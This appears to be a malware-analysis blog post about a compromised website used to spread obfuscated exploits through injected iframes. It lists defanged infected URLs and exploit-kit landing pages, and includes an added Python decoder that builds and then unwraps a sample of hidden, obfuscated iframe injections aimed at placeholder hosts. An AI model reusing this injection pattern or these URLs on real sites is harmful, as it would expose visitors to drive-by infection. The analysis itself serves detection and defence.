Another technique widely used by cyber-criminals to attack computers via web scripting is the injection of malicious instructions into the code of a page.
In this case, a website hosted on a compromised server is used as a vector for spreading malware by exploiting vulnerabilities on unprotected computers. Some of the pages used are:
http://team-sleep.by .ru/default2 .html
http://team-sleep.by .ru/demo .html
http://team-sleep.by .ru/disco .html
http://team-sleep.by .ru/downloads .html
http://team-sleep.by .ru/enter .html
http://team-sleep.by .ru/gold .html
http://team-sleep.by .ru/googleanalyticsru .html
http://team-sleep.by .ru/guest .html
http://team-sleep.by .ru/guestbook .html
http://team-sleep.by .ru/media .html
http://team-sleep.by .ru/menu .html
http://team-sleep.by .ru/news .html
http://team-sleep.by .ru/photo2 .html
http://team-sleep.by .ru/poem .html
http://team-sleep.by .ru/press_reviews .html
http://team-sleep.by .ru/team-sleep .html
http://team-sleep.by .ru/wallpapers .html
http://team-sleep.by .ru/gmail .php
http://team-sleep.by .ru/haitou .php
http://team-sleep.by .ru/in .php
http://team-sleep.by .ru/xxx .php
http://team-sleep.by .ru/photo/team .html
http://team-sleep.by .ru/photo/wallz .html
http://team-sleep.by .ru/photo/live/index2 .html
http://team-sleep.by .ru/photo/live/imagepages/image1 .html
http://team-sleep.by .ru/photo/members/imagepages/image1 .html
http://team-sleep.by .ru/photo/team/imagepages/image1 .html
The list is long (98 pages on the site); the graph, however, represents all of them.
Each of these web addresses is distributed through channels such as email or instant-messaging clients using social engineering, and each hosts several different scripts containing obfuscated exploits.
Decoding the scripts, we find iframe tags that redirect to other URLs, such as:
- http://5rublei .com/unique/index .php
- http://tochtonenado .com/yes/index .php
As the picture shows, this appears to be the work of two known crimeware kits, Unique Sploits Pack and YES Exploit System.
This shows that cyber-criminals are constantly looking for quick, simple and, ideally, automated ways to diversify their attacks and increase their profits.
In this way, the "professionals" behind this malware, where the main actor seeks to expand the range of infections, operate as botmasters managing harmful activity to obtain a greater flow of distribution.
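The decoding step described above, as an added example that is not part of the original post: a small static decoder that peels the two wrappers injected scripts of this kind typically used, `unescape('%3C...')` and `String.fromCharCode(60, 105, ...)`, until a plain `<iframe>` tag appears, then reports every iframe target and whether the frame was sized to be invisible. The sample page is assembled by the example itself using the same wrappers; the `kit1.example` and `kit2.example` hosts are placeholders standing in for the two landing pages named above, not real domains.

```python
import re
from urllib.parse import quote

# --- Constructed sample input ---------------------------------------------
# Two iframes as a kit would inject them, each behind one obfuscation layer.
# Host names are placeholders (assumption), not the landing pages in the post.
FRAME_1 = ('<iframe src="http://kit1.example/unique/index.php" '
           'width=0 height=0 style="visibility:hidden"></iframe>')
FRAME_2 = '<iframe src="http://kit2.example/yes/index.php" width=1 height=1></iframe>'

# Layer A: document.write(unescape('%3Ciframe...'))
INJECTED_1 = "document.write(unescape('%s'));" % quote(FRAME_1, safe="/.")
# Layer B: eval(String.fromCharCode(100,111,...)) wrapping a document.write call
INNER_2 = "document.write('%s')" % FRAME_2
INJECTED_2 = "eval(String.fromCharCode(%s));" % ",".join(str(ord(c)) for c in INNER_2)

SAMPLE_PAGE = f"""<html><body>
<h1>Fan page</h1>
<p>Welcome.</p>
<script>{INJECTED_1}</script>
<script type="text/javascript">{INJECTED_2}</script>
<iframe src="http://video.example/embed" width="400" height="300"></iframe>
</body></html>"""

# --- Decoder ---------------------------------------------------------------
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"([\w-]+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>\"']+))")


def js_unescape(s: str) -> str:
    """JavaScript unescape(): %uXXXX and %XX sequences to characters."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


def decode_layers(js: str, max_rounds: int = 10) -> str:
    """Replace unescape()/String.fromCharCode() calls with their plaintext,
    repeating until nothing changes (layers are often nested)."""
    for _ in range(max_rounds):
        new = UNESCAPE_RE.sub(lambda m: js_unescape(m.group(2)), js)
        new = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(n)) for n in re.split(r"[\s,]+", m.group(1)) if n),
            new)
        if new == js:
            break
        js = new
    return js


def parse_attrs(attr_text: str) -> dict:
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs


def is_hidden(attrs: dict) -> bool:
    """Zero/one-pixel frames or CSS-hidden frames are the usual drive-by tell."""
    def tiny(v: str) -> bool:
        try:
            return int(v.rstrip("px")) <= 1
        except ValueError:
            return False
    style = attrs.get("style", "").replace(" ", "").lower()
    return (tiny(attrs.get("width", "")) or tiny(attrs.get("height", ""))
            or "visibility:hidden" in style or "display:none" in style)


def find_iframes(html: str) -> list:
    """Return (src, hidden, origin) for every iframe, including those that only
    exist after decoding the page's scripts."""
    found = []
    for m in IFRAME_RE.finditer(SCRIPT_RE.sub("", html)):
        a = parse_attrs(m.group(1))
        found.append((a.get("src", ""), is_hidden(a), "markup"))
    for s in SCRIPT_RE.finditer(html):
        for m in IFRAME_RE.finditer(decode_layers(s.group(1))):
            a = parse_attrs(m.group(1))
            found.append((a.get("src", ""), is_hidden(a), "script"))
    return found


def suspicious(html: str) -> list:
    """Only the hidden frames: the redirect targets worth blocking or sandboxing."""
    return [r for r in find_iframes(html) if r[1]]


if __name__ == "__main__":
    for src, hidden, origin in find_iframes(SAMPLE_PAGE):
        print(f"{'HIDDEN ' if hidden else 'visible'} [{origin}] {src}")
```

The decoder is deliberately static: it never fetches the iframe targets and never executes the script, so it is safe to run over a crawl of an infected site. Its limit is also its design choice: kits that chain `eval` through custom decoding functions defeat regex unwrapping, and for those the fallback is to run the script in an instrumented JavaScript sandbox and hook `document.write`.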
Related Information
Scripting attack. Exploitation of multiple vulnerabilities - Spanish version
Exploitation of vulnerabilities through PDFs - Spanish version
Exploiting vulnerabilities through SWF - Spanish version
Exploitation of vulnerabilities through JS - Spanish version
Analysis of an attack of web-based malware - Spanish version
LuckySploit, the right hand of Zeus - Spanish version
Massive exploitation of vulnerabilities through servers ghosts - Spanish version
# Jorge Mieres